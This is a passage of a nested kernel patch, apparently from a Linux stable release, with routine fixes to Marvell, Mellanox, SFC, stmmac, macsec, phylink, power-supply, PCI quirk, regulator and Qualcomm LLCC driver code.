+ 		free_cnt = rvu_rsrc_free_count(&txsch->schq);
+ 	}
+ 
+-	if (free_cnt < req_schq || req_schq > MAX_TXSCHQ_PER_FUNC)
++	if (free_cnt < req_schq || req->schq[lvl] > MAX_TXSCHQ_PER_FUNC ||
++	    req->schq_contig[lvl] > MAX_TXSCHQ_PER_FUNC)
+ 		return NIX_AF_ERR_TLX_ALLOC_FAIL;
+ 
+ 	/* If contiguous queues are needed, check for availability */
+@@ -4069,10 +4070,6 @@ int rvu_mbox_handler_nix_set_rx_cfg(struct rvu *rvu, struct nix_rx_cfg *req,
+ 
+ static u64 rvu_get_lbk_link_credits(struct rvu *rvu, u16 lbk_max_frs)
+ {
+-	/* CN10k supports 72KB FIFO size and max packet size of 64k */
+-	if (rvu->hw->lbk_bufsize == 0x12000)
+-		return (rvu->hw->lbk_bufsize - lbk_max_frs) / 16;
+-
+ 	return 1600; /* 16 * max LBK datarate = 16 * 100Gbps */
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index 3182adb7b9a80..3b48b635977f6 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -1168,10 +1168,8 @@ static u16 __rvu_npc_exact_cmd_rules_cnt_update(struct rvu *rvu, int drop_mcam_i
+ {
+ 	struct npc_exact_table *table;
+ 	u16 *cnt, old_cnt;
+-	bool promisc;
+ 
+ 	table = rvu->hw->table;
+-	promisc = table->promisc_mode[drop_mcam_idx];
+ 
+ 	cnt = &table->cnt_cmd_rules[drop_mcam_idx];
+ 	old_cnt = *cnt;
+@@ -1183,16 +1181,13 @@ static u16 __rvu_npc_exact_cmd_rules_cnt_update(struct rvu *rvu, int drop_mcam_i
+ 
+ 	*enable_or_disable_cam = false;
+ 
+-	if (promisc)
+-		goto done;
+-
+-	/* If all rules are deleted and not already in promisc mode; disable cam */
++	/* If all rules are deleted, disable cam */
+ 	if (!*cnt && val < 0) {
+ 		*enable_or_disable_cam = true;
+ 		goto done;
+ 	}
+ 
+-	/* If rule got added and not already in promisc mode; enable cam */
++	/* If rule got added, enable cam */
+ 	if (!old_cnt && val > 0) {
+ 		*enable_or_disable_cam = true;
+ 		goto done;
+@@ -1447,7 +1442,6 @@ int rvu_npc_exact_promisc_disable(struct rvu *rvu, u16 pcifunc)
+ 	u32 drop_mcam_idx;
+ 	bool *promisc;
+ 	bool rc;
+-	u32 cnt;
+ 
+ 	table = rvu->hw->table;
+ 
+@@ -1470,17 +1464,8 @@ int rvu_npc_exact_promisc_disable(struct rvu *rvu, u16 pcifunc)
+ 		return LMAC_AF_ERR_INVALID_PARAM;
+ 	}
+ 	*promisc = false;
+-	cnt = __rvu_npc_exact_cmd_rules_cnt_update(rvu, drop_mcam_idx, 0, NULL);
+ 	mutex_unlock(&table->lock);
+ 
+-	/* If no dmac filter entries configured, disable drop rule */
+-	if (!cnt)
+-		rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX, false);
+-	else
+-		rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX, !*promisc);
+-
+-	dev_dbg(rvu->dev, "%s: disabled  promisc mode (cgx=%d lmac=%d, cnt=%d)\n",
+-		__func__, cgx_id, lmac_id, cnt);
+ 	return 0;
+ }
+ 
+@@ -1498,7 +1483,6 @@ int rvu_npc_exact_promisc_enable(struct rvu *rvu, u16 pcifunc)
+ 	u32 drop_mcam_idx;
+ 	bool *promisc;
+ 	bool rc;
+-	u32 cnt;
+ 
+ 	table = rvu->hw->table;
+ 
+@@ -1521,17 +1505,8 @@ int rvu_npc_exact_promisc_enable(struct rvu *rvu, u16 pcifunc)
+ 		return LMAC_AF_ERR_INVALID_PARAM;
+ 	}
+ 	*promisc = true;
+-	cnt = __rvu_npc_exact_cmd_rules_cnt_update(rvu, drop_mcam_idx, 0, NULL);
+ 	mutex_unlock(&table->lock);
+ 
+-	/* If no dmac filter entries configured, disable drop rule */
+-	if (!cnt)
+-		rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX, false);
+-	else
+-		rvu_npc_enable_mcam_by_entry_index(rvu, drop_mcam_idx, NIX_INTF_RX, !*promisc);
+-
+-	dev_dbg(rvu->dev, "%s: Enabled promisc mode (cgx=%d lmac=%d cnt=%d)\n",
+-		__func__, cgx_id, lmac_id, cnt);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+index 1a35b3c2a3674..0b560e97a3563 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_core.h
+@@ -275,18 +275,6 @@ static inline bool mlx5_sriov_is_enabled(struct mlx5_core_dev *dev)
+ 	return pci_num_vf(dev->pdev) ? true : false;
+ }
+ 
+-static inline int mlx5_lag_is_lacp_owner(struct mlx5_core_dev *dev)
+-{
+-	/* LACP owner conditions:
+-	 * 1) Function is physical.
+-	 * 2) LAG is supported by FW.
+-	 * 3) LAG is managed by driver (currently the only option).
+-	 */
+-	return  MLX5_CAP_GEN(dev, vport_group_manager) &&
+-		   (MLX5_CAP_GEN(dev, num_lag_ports) > 1) &&
+-		    MLX5_CAP_GEN(dev, lag_master);
+-}
+-
+ int mlx5_rescan_drivers_locked(struct mlx5_core_dev *dev);
+ static inline int mlx5_rescan_drivers(struct mlx5_core_dev *dev)
+ {
+diff --git a/drivers/net/ethernet/sfc/efx_channels.c b/drivers/net/ethernet/sfc/efx_channels.c
+index aaa381743bca3..27d00ffac68f4 100644
+--- a/drivers/net/ethernet/sfc/efx_channels.c
++++ b/drivers/net/ethernet/sfc/efx_channels.c
+@@ -301,6 +301,7 @@ int efx_probe_interrupts(struct efx_nic *efx)
+ 		efx->tx_channel_offset = 0;
+ 		efx->n_xdp_channels = 0;
+ 		efx->xdp_channel_offset = efx->n_channels;
++		efx->xdp_txq_queues_mode = EFX_XDP_TX_QUEUES_BORROWED;
+ 		rc = pci_enable_msi(efx->pci_dev);
+ 		if (rc == 0) {
+ 			efx_get_channel(efx, 0)->irq = efx->pci_dev->irq;
+@@ -322,6 +323,7 @@ int efx_probe_interrupts(struct efx_nic *efx)
+ 		efx->tx_channel_offset = efx_separate_tx_channels ? 1 : 0;
+ 		efx->n_xdp_channels = 0;
+ 		efx->xdp_channel_offset = efx->n_channels;
++		efx->xdp_txq_queues_mode = EFX_XDP_TX_QUEUES_BORROWED;
+ 		efx->legacy_irq = efx->pci_dev->irq;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/sfc/siena/efx_channels.c b/drivers/net/ethernet/sfc/siena/efx_channels.c
+index 06ed74994e366..1776f7f8a7a90 100644
+--- a/drivers/net/ethernet/sfc/siena/efx_channels.c
++++ b/drivers/net/ethernet/sfc/siena/efx_channels.c
+@@ -302,6 +302,7 @@ int efx_siena_probe_interrupts(struct efx_nic *efx)
+ 		efx->tx_channel_offset = 0;
+ 		efx->n_xdp_channels = 0;
+ 		efx->xdp_channel_offset = efx->n_channels;
++		efx->xdp_txq_queues_mode = EFX_XDP_TX_QUEUES_BORROWED;
+ 		rc = pci_enable_msi(efx->pci_dev);
+ 		if (rc == 0) {
+ 			efx_get_channel(efx, 0)->irq = efx->pci_dev->irq;
+@@ -323,6 +324,7 @@ int efx_siena_probe_interrupts(struct efx_nic *efx)
+ 		efx->tx_channel_offset = efx_siena_separate_tx_channels ? 1 : 0;
+ 		efx->n_xdp_channels = 0;
+ 		efx->xdp_channel_offset = efx->n_channels;
++		efx->xdp_txq_queues_mode = EFX_XDP_TX_QUEUES_BORROWED;
+ 		efx->legacy_irq = efx->pci_dev->irq;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 4903157230621..30ce073055785 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -3865,7 +3865,6 @@ irq_error:
+ 
+ 	stmmac_hw_teardown(dev);
+ init_error:
+-	free_dma_desc_resources(priv, &priv->dma_conf);
+ 	phylink_disconnect_phy(priv->phylink);
+ init_phy_error:
+ 	pm_runtime_put(priv->device);
+@@ -3883,6 +3882,9 @@ static int stmmac_open(struct net_device *dev)
+ 		return PTR_ERR(dma_conf);
+ 
+ 	ret = __stmmac_open(dev, dma_conf);
++	if (ret)
++		free_dma_desc_resources(priv, dma_conf);
++
+ 	kfree(dma_conf);
+ 	return ret;
+ }
+@@ -5607,12 +5609,15 @@ static int stmmac_change_mtu(struct net_device *dev, int new_mtu)
+ 		stmmac_release(dev);
+ 
+ 		ret = __stmmac_open(dev, dma_conf);
+-		kfree(dma_conf);
+ 		if (ret) {
++			free_dma_desc_resources(priv, dma_conf);
++			kfree(dma_conf);
+ 			netdev_err(priv->dev, "failed reopening the interface after MTU change\n");
+ 			return ret;
+ 		}
+ 
++		kfree(dma_conf);
++
+ 		stmmac_set_rx_mode(dev);
+ 	}
+ 
+diff --git a/drivers/net/ipvlan/ipvlan_l3s.c b/drivers/net/ipvlan/ipvlan_l3s.c
+index 71712ea25403d..d5b05e8032199 100644
+--- a/drivers/net/ipvlan/ipvlan_l3s.c
++++ b/drivers/net/ipvlan/ipvlan_l3s.c
+@@ -102,6 +102,10 @@ static unsigned int ipvlan_nf_input(void *priv, struct sk_buff *skb,
+ 
+ 	skb->dev = addr->master->dev;
+ 	skb->skb_iif = skb->dev->ifindex;
++#if IS_ENABLED(CONFIG_IPV6)
++	if (addr->atype == IPVL_IPV6)
++		IP6CB(skb)->iif = skb->dev->ifindex;
++#endif
+ 	len = skb->len + ETH_HLEN;
+ 	ipvlan_count_rx(addr->master, len, true, false);
+ out:
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 038a787943927..983cabf9a0f67 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -3981,17 +3981,15 @@ static int macsec_add_dev(struct net_device *dev, sci_t sci, u8 icv_len)
+ 		return -ENOMEM;
+ 
+ 	secy->tx_sc.stats = netdev_alloc_pcpu_stats(struct pcpu_tx_sc_stats);
+-	if (!secy->tx_sc.stats) {
+-		free_percpu(macsec->stats);
++	if (!secy->tx_sc.stats)
+ 		return -ENOMEM;
+-	}
+ 
+ 	secy->tx_sc.md_dst = metadata_dst_alloc(0, METADATA_MACSEC, GFP_KERNEL);
+-	if (!secy->tx_sc.md_dst) {
+-		free_percpu(secy->tx_sc.stats);
+-		free_percpu(macsec->stats);
++	if (!secy->tx_sc.md_dst)
++		/* macsec and secy percpu stats will be freed when unregistering
++		 * net_device in macsec_free_netdev()
++		 */
+ 		return -ENOMEM;
+-	}
+ 
+ 	if (sci == MACSEC_UNDEF_SCI)
+ 		sci = dev_to_sci(dev, MACSEC_PORT_ES);
+diff --git a/drivers/net/phy/phylink.c b/drivers/net/phy/phylink.c
+index 4073e8243df3f..5b064a1de92f0 100644
+--- a/drivers/net/phy/phylink.c
++++ b/drivers/net/phy/phylink.c
+@@ -188,6 +188,7 @@ static int phylink_interface_max_speed(phy_interface_t interface)
+ 	case PHY_INTERFACE_MODE_RGMII_ID:
+ 	case PHY_INTERFACE_MODE_RGMII:
+ 	case PHY_INTERFACE_MODE_QSGMII:
++	case PHY_INTERFACE_MODE_QUSGMII:
+ 	case PHY_INTERFACE_MODE_SGMII:
+ 	case PHY_INTERFACE_MODE_GMII:
+ 		return SPEED_1000;
+@@ -204,7 +205,6 @@ static int phylink_interface_max_speed(phy_interface_t interface)
+ 	case PHY_INTERFACE_MODE_10GBASER:
+ 	case PHY_INTERFACE_MODE_10GKR:
+ 	case PHY_INTERFACE_MODE_USXGMII:
+-	case PHY_INTERFACE_MODE_QUSGMII:
+ 		return SPEED_10000;
+ 
+ 	case PHY_INTERFACE_MODE_25GBASER:
+@@ -3263,6 +3263,41 @@ void phylink_decode_usxgmii_word(struct phylink_link_state *state,
+ }
+ EXPORT_SYMBOL_GPL(phylink_decode_usxgmii_word);
+ 
++/**
++ * phylink_decode_usgmii_word() - decode the USGMII word from a MAC PCS
++ * @state: a pointer to a struct phylink_link_state.
++ * @lpa: a 16 bit value which stores the USGMII auto-negotiation word
++ *
++ * Helper for MAC PCS supporting the USGMII protocol and the auto-negotiation
++ * code word.  Decode the USGMII code word and populate the corresponding fields
++ * (speed, duplex) into the phylink_link_state structure. The structure for this
++ * word is the same as the USXGMII word, except it only supports speeds up to
++ * 1Gbps.
++ */
++static void phylink_decode_usgmii_word(struct phylink_link_state *state,
++				       uint16_t lpa)
++{
++	switch (lpa & MDIO_USXGMII_SPD_MASK) {
++	case MDIO_USXGMII_10:
++		state->speed = SPEED_10;
++		break;
++	case MDIO_USXGMII_100:
++		state->speed = SPEED_100;
++		break;
++	case MDIO_USXGMII_1000:
++		state->speed = SPEED_1000;
++		break;
++	default:
++		state->link = false;
++		return;
++	}
++
++	if (lpa & MDIO_USXGMII_FULL_DUPLEX)
++		state->duplex = DUPLEX_FULL;
++	else
++		state->duplex = DUPLEX_HALF;
++}
++
+ /**
+  * phylink_mii_c22_pcs_decode_state() - Decode MAC PCS state from MII registers
+  * @state: a pointer to a &struct phylink_link_state.
+@@ -3299,9 +3334,11 @@ void phylink_mii_c22_pcs_decode_state(struct phylink_link_state *state,
+ 
+ 	case PHY_INTERFACE_MODE_SGMII:
+ 	case PHY_INTERFACE_MODE_QSGMII:
+-	case PHY_INTERFACE_MODE_QUSGMII:
+ 		phylink_decode_sgmii_word(state, lpa);
+ 		break;
++	case PHY_INTERFACE_MODE_QUSGMII:
++		phylink_decode_usgmii_word(state, lpa);
++		break;
+ 
+ 	default:
+ 		state->link = false;
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 45c2585011351..68829a5a93d3e 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1219,7 +1219,9 @@ static const struct usb_device_id products[] = {
+ 	{QMI_FIXED_INTF(0x05c6, 0x9080, 8)},
+ 	{QMI_FIXED_INTF(0x05c6, 0x9083, 3)},
+ 	{QMI_FIXED_INTF(0x05c6, 0x9084, 4)},
++	{QMI_QUIRK_SET_DTR(0x05c6, 0x9091, 2)},	/* Compal RXM-G1 */
+ 	{QMI_FIXED_INTF(0x05c6, 0x90b2, 3)},    /* ublox R410M */
++	{QMI_QUIRK_SET_DTR(0x05c6, 0x90db, 2)},	/* Compal RXM-G1 */
+ 	{QMI_FIXED_INTF(0x05c6, 0x920d, 0)},
+ 	{QMI_FIXED_INTF(0x05c6, 0x920d, 5)},
+ 	{QMI_QUIRK_SET_DTR(0x05c6, 0x9625, 4)},	/* YUGA CLM920-NC5 */
+diff --git a/drivers/net/wan/lapbether.c b/drivers/net/wan/lapbether.c
+index d62a904d2e422..56326f38fe8a3 100644
+--- a/drivers/net/wan/lapbether.c
++++ b/drivers/net/wan/lapbether.c
+@@ -384,6 +384,9 @@ static int lapbeth_new_device(struct net_device *dev)
+ 
+ 	ASSERT_RTNL();
+ 
++	if (dev->type != ARPHRD_ETHER)
++		return -EINVAL;
++
+ 	ndev = alloc_netdev(sizeof(*lapbeth), "lapb%d", NET_NAME_UNKNOWN,
+ 			    lapbeth_setup);
+ 	if (!ndev)
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index ba4903c86f7ff..145fa7ef3f740 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3537,6 +3537,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1e4B, 0x1202),   /* MAXIO MAP1202 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
++	{ PCI_DEVICE(0x1e4B, 0x1602),   /* MAXIO MAP1602 */
++		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1cc1, 0x5350),   /* ADATA XPG GAMMIX S50 */
+ 		.driver_data = NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x1dbe, 0x5236),   /* ADATA XPG GAMMIX S70 */
+diff --git a/drivers/of/overlay.c b/drivers/of/overlay.c
+index ed4e6c144a681..5289975bad708 100644
+--- a/drivers/of/overlay.c
++++ b/drivers/of/overlay.c
+@@ -811,6 +811,7 @@ static int init_overlay_changeset(struct overlay_changeset *ovcs)
+ 		if (!fragment->target) {
+ 			pr_err("symbols in overlay, but not in live tree\n");
+ 			ret = -EINVAL;
++			of_node_put(node);
+ 			goto err_out;
+ 		}
+ 
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 8d32a3834688f..ccc90656130a0 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -5995,8 +5995,9 @@ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x56c1, aspm_l1_acceptable_latency
+ 
+ #ifdef CONFIG_PCIE_DPC
+ /*
+- * Intel Tiger Lake and Alder Lake BIOS has a bug that clears the DPC
+- * RP PIO Log Size of the integrated Thunderbolt PCIe Root Ports.
++ * Intel Ice Lake, Tiger Lake and Alder Lake BIOS has a bug that clears
++ * the DPC RP PIO Log Size of the integrated Thunderbolt PCIe Root
++ * Ports.
+  */
+ static void dpc_log_size(struct pci_dev *dev)
+ {
+@@ -6019,6 +6020,10 @@ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x461f, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x462f, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x463f, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x466e, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x8a1d, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x8a1f, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x8a21, dpc_log_size);
++DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x8a23, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a23, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a25, dpc_log_size);
+ DECLARE_PCI_FIXUP_HEADER(PCI_VENDOR_ID_INTEL, 0x9a27, dpc_log_size);
+diff --git a/drivers/platform/x86/asus-nb-wmi.c b/drivers/platform/x86/asus-nb-wmi.c
+index e2c9a68d12df9..fdf7da06af306 100644
+--- a/drivers/platform/x86/asus-nb-wmi.c
++++ b/drivers/platform/x86/asus-nb-wmi.c
+@@ -555,6 +555,7 @@ static const struct key_entry asus_nb_wmi_keymap[] = {
+ 	{ KE_KEY, 0x71, { KEY_F13 } }, /* General-purpose button */
+ 	{ KE_IGNORE, 0x79, },  /* Charger type dectection notification */
+ 	{ KE_KEY, 0x7a, { KEY_ALS_TOGGLE } }, /* Ambient Light Sensor Toggle */
++	{ KE_IGNORE, 0x7B, }, /* Charger connect/disconnect notification */
+ 	{ KE_KEY, 0x7c, { KEY_MICMUTE } },
+ 	{ KE_KEY, 0x7D, { KEY_BLUETOOTH } }, /* Bluetooth Enable */
+ 	{ KE_KEY, 0x7E, { KEY_BLUETOOTH } }, /* Bluetooth Disable */
+@@ -584,6 +585,7 @@ static const struct key_entry asus_nb_wmi_keymap[] = {
+ 	{ KE_KEY, 0xAE, { KEY_FN_F5 } }, /* Fn+F5 fan mode on 2020+ */
+ 	{ KE_KEY, 0xB3, { KEY_PROG4 } }, /* AURA */
+ 	{ KE_KEY, 0xB5, { KEY_CALC } },
++	{ KE_IGNORE, 0xC0, }, /* External display connect/disconnect notification */
+ 	{ KE_KEY, 0xC4, { KEY_KBDILLUMUP } },
+ 	{ KE_KEY, 0xC5, { KEY_KBDILLUMDOWN } },
+ 	{ KE_IGNORE, 0xC6, },  /* Ambient Light Sensor notification */
+diff --git a/drivers/power/supply/ab8500_btemp.c b/drivers/power/supply/ab8500_btemp.c
+index 307ee6f71042e..6f83e99d2eb72 100644
+--- a/drivers/power/supply/ab8500_btemp.c
++++ b/drivers/power/supply/ab8500_btemp.c
+@@ -624,10 +624,8 @@ static int ab8500_btemp_get_ext_psy_data(struct device *dev, void *data)
+  */
+ static void ab8500_btemp_external_power_changed(struct power_supply *psy)
+ {
+-	struct ab8500_btemp *di = power_supply_get_drvdata(psy);
+-
+-	class_for_each_device(power_supply_class, NULL,
+-		di->btemp_psy, ab8500_btemp_get_ext_psy_data);
++	class_for_each_device(power_supply_class, NULL, psy,
++			      ab8500_btemp_get_ext_psy_data);
+ }
+ 
+ /* ab8500 btemp driver interrupts and their respective isr */
+diff --git a/drivers/power/supply/ab8500_fg.c b/drivers/power/supply/ab8500_fg.c
+index c6c9804280dbe..71ce28eed463f 100644
+--- a/drivers/power/supply/ab8500_fg.c
++++ b/drivers/power/supply/ab8500_fg.c
+@@ -2407,10 +2407,8 @@ out:
+  */
+ static void ab8500_fg_external_power_changed(struct power_supply *psy)
+ {
+-	struct ab8500_fg *di = power_supply_get_drvdata(psy);
+-
+-	class_for_each_device(power_supply_class, NULL,
+-		di->fg_psy, ab8500_fg_get_ext_psy_data);
++	class_for_each_device(power_supply_class, NULL, psy,
++			      ab8500_fg_get_ext_psy_data);
+ }
+ 
+ /**
+diff --git a/drivers/power/supply/bq27xxx_battery.c b/drivers/power/supply/bq27xxx_battery.c
+index 17a09d103a59c..4a5371a3a5313 100644
+--- a/drivers/power/supply/bq27xxx_battery.c
++++ b/drivers/power/supply/bq27xxx_battery.c
+@@ -1083,10 +1083,8 @@ static int poll_interval_param_set(const char *val, const struct kernel_param *k
+ 		return ret;
+ 
+ 	mutex_lock(&bq27xxx_list_lock);
+-	list_for_each_entry(di, &bq27xxx_battery_devices, list) {
+-		cancel_delayed_work_sync(&di->work);
+-		schedule_delayed_work(&di->work, 0);
+-	}
++	list_for_each_entry(di, &bq27xxx_battery_devices, list)
++		mod_delayed_work(system_wq, &di->work, 0);
+ 	mutex_unlock(&bq27xxx_list_lock);
+ 
+ 	return ret;
+diff --git a/drivers/power/supply/power_supply_core.c b/drivers/power/supply/power_supply_core.c
+index 8382be867d274..7871ab5e979c0 100644
+--- a/drivers/power/supply/power_supply_core.c
++++ b/drivers/power/supply/power_supply_core.c
+@@ -348,6 +348,10 @@ static int __power_supply_is_system_supplied(struct device *dev, void *data)
+ 	struct power_supply *psy = dev_get_drvdata(dev);
+ 	unsigned int *count = data;
+ 
++	if (!psy->desc->get_property(psy, POWER_SUPPLY_PROP_SCOPE, &ret))
++		if (ret.intval == POWER_SUPPLY_SCOPE_DEVICE)
++			return 0;
++
+ 	(*count)++;
+ 	if (psy->desc->type != POWER_SUPPLY_TYPE_BATTERY)
+ 		if (!psy->desc->get_property(psy, POWER_SUPPLY_PROP_ONLINE,
+@@ -366,8 +370,8 @@ int power_supply_is_system_supplied(void)
+ 				      __power_supply_is_system_supplied);
+ 
+ 	/*
+-	 * If no power class device was found at all, most probably we are
+-	 * running on a desktop system, so assume we are on mains power.
++	 * If no system scope power class device was found at all, most probably we
++	 * are running on a desktop system, so assume we are on mains power.
+ 	 */
+ 	if (count == 0)
+ 		return 1;
+diff --git a/drivers/power/supply/power_supply_sysfs.c b/drivers/power/supply/power_supply_sysfs.c
+index 5369abaceb5cc..7abd916d005a6 100644
+--- a/drivers/power/supply/power_supply_sysfs.c
++++ b/drivers/power/supply/power_supply_sysfs.c
+@@ -285,7 +285,8 @@ static ssize_t power_supply_show_property(struct device *dev,
+ 
+ 		if (ret < 0) {
+ 			if (ret == -ENODATA)
+-				dev_dbg(dev, "driver has no data for `%s' property\n",
++				dev_dbg_ratelimited(dev,
++					"driver has no data for `%s' property\n",
+ 					attr->attr.name);
+ 			else if (ret != -ENODEV && ret != -EAGAIN)
+ 				dev_err_ratelimited(dev,
+diff --git a/drivers/power/supply/sc27xx_fuel_gauge.c b/drivers/power/supply/sc27xx_fuel_gauge.c
+index 632977f84b954..bd23c4d9fed43 100644
+--- a/drivers/power/supply/sc27xx_fuel_gauge.c
++++ b/drivers/power/supply/sc27xx_fuel_gauge.c
+@@ -733,13 +733,6 @@ static int sc27xx_fgu_set_property(struct power_supply *psy,
+ 	return ret;
+ }
+ 
+-static void sc27xx_fgu_external_power_changed(struct power_supply *psy)
+-{
+-	struct sc27xx_fgu_data *data = power_supply_get_drvdata(psy);
+-
+-	power_supply_changed(data->battery);
+-}
+-
+ static int sc27xx_fgu_property_is_writeable(struct power_supply *psy,
+ 					    enum power_supply_property psp)
+ {
+@@ -774,7 +767,7 @@ static const struct power_supply_desc sc27xx_fgu_desc = {
+ 	.num_properties		= ARRAY_SIZE(sc27xx_fgu_props),
+ 	.get_property		= sc27xx_fgu_get_property,
+ 	.set_property		= sc27xx_fgu_set_property,
+-	.external_power_changed	= sc27xx_fgu_external_power_changed,
++	.external_power_changed	= power_supply_changed,
+ 	.property_is_writeable	= sc27xx_fgu_property_is_writeable,
+ 	.no_thermal		= true,
+ };
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index c417eae887b2d..e01cade8be0c7 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -5257,7 +5257,7 @@ static void rdev_init_debugfs(struct regulator_dev *rdev)
+ 	}
+ 
+ 	rdev->debugfs = debugfs_create_dir(rname, debugfs_root);
+-	if (!rdev->debugfs) {
++	if (IS_ERR(rdev->debugfs)) {
+ 		rdev_warn(rdev, "Failed to create debugfs directory\n");
+ 		return;
+ 	}
+@@ -6179,7 +6179,7 @@ static int __init regulator_init(void)
+ 	ret = class_register(&regulator_class);
+ 
+ 	debugfs_root = debugfs_create_dir("regulator", NULL);
+-	if (!debugfs_root)
++	if (IS_ERR(debugfs_root))
+ 		pr_warn("regulator: Failed to create debugfs directory\n");
+ 
+ #ifdef CONFIG_DEBUG_FS
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index d4cba3b3c56c4..85219b5e1f416 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -50,8 +50,6 @@
+ #define LLCC_TRP_WRSC_EN              0x21f20
+ #define LLCC_TRP_WRSC_CACHEABLE_EN    0x21f2c
+ 
+-#define BANK_OFFSET_STRIDE	      0x80000
+-
+ #define LLCC_VERSION_2_0_0_0          0x02000000
+ #define LLCC_VERSION_2_1_0_0          0x02010000
+ 
+@@ -749,8 +747,8 @@ static int qcom_llcc_remove(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static struct regmap *qcom_llcc_init_mmio(struct platform_device *pdev,
+-		const char *name)
++static struct regmap *qcom_llcc_init_mmio(struct platform_device *pdev, u8 index,
++					  const char *name)
+ {
+ 	void __iomem *base;
+ 	struct regmap_config llcc_regmap_config = {
+@@ -760,7 +758,7 @@ static struct regmap *qcom_llcc_init_mmio(struct platform_device *pdev,
+ 		.fast_io = true,
+ 	};
+ 
+-	base = devm_platform_ioremap_resource_byname(pdev, name);
++	base = devm_platform_ioremap_resource(pdev, index);
+ 	if (IS_ERR(base))
+ 		return ERR_CAST(base);
+ 
+@@ -778,6 +776,7 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 	const struct llcc_slice_config *llcc_cfg;
+ 	u32 sz;
+ 	u32 version;
++	struct regmap *regmap;
+ 
+ 	drv_data = devm_kzalloc(dev, sizeof(*drv_data), GFP_KERNEL);
+ 	if (!drv_data) {
+@@ -785,21 +784,51 @@ static int qcom_llcc_probe(struct platform_device *pdev)
+ 		goto err;
+ 	}
+ 
+-	drv_data->regmap = qcom_llcc_init_mmio(pdev, "llcc_base");
+-	if (IS_ERR(drv_data->regmap)) {
+-		ret = PTR_ERR(drv_data->regmap);
++	/* Initialize the first LLCC bank regmap */
++	regmap = qcom_llcc_init_mmio(pdev, 0, "llcc0_base");
++	if (IS_ERR(regmap)) {
++		ret = PTR_ERR(regmap);
+ 		goto err;
+ 	}
+ 
+-	drv_data->bcast_regmap =
+-		qcom_llcc_init_mmio(pdev, "llcc_broadcast_base");
++	cfg = of_device_get_match_data(&pdev->dev);
++
++	ret = regmap_read(regmap, cfg->reg_offset[LLCC_COMMON_STATUS0], &num_banks);
++	if (ret)
++		goto err;
++
++	num_banks &= LLCC_LB_CNT_MASK;
++	num_banks >>= LLCC_LB_CNT_SHIFT;
++	drv_data->num_banks = num_banks;
++
++	drv_data->regmaps = devm_kcalloc(dev, num_banks, sizeof(*drv_data->regmaps), GFP_KERNEL);
++	if (!drv_data->regmaps) {
++		ret = -ENOMEM;
++		goto err;
++	}
++
++	drv_data->regmaps[0] = regmap;
++
++	/* Initialize rest of LLCC bank regmaps */
++	for (i = 1; i < num_banks; i++) {
++		char *base = kasprintf(GFP_KERNEL, "llcc%d_base", i);
++
++		drv_data->regmaps[i] = qcom_llcc_init_mmio(pdev, i, base);
++		if (IS_ERR(drv_data->regmaps[i])) {
++			ret = PTR_ERR(drv_data->regmaps[i]);
++			kfree(base);
++			goto err;
++		}
++
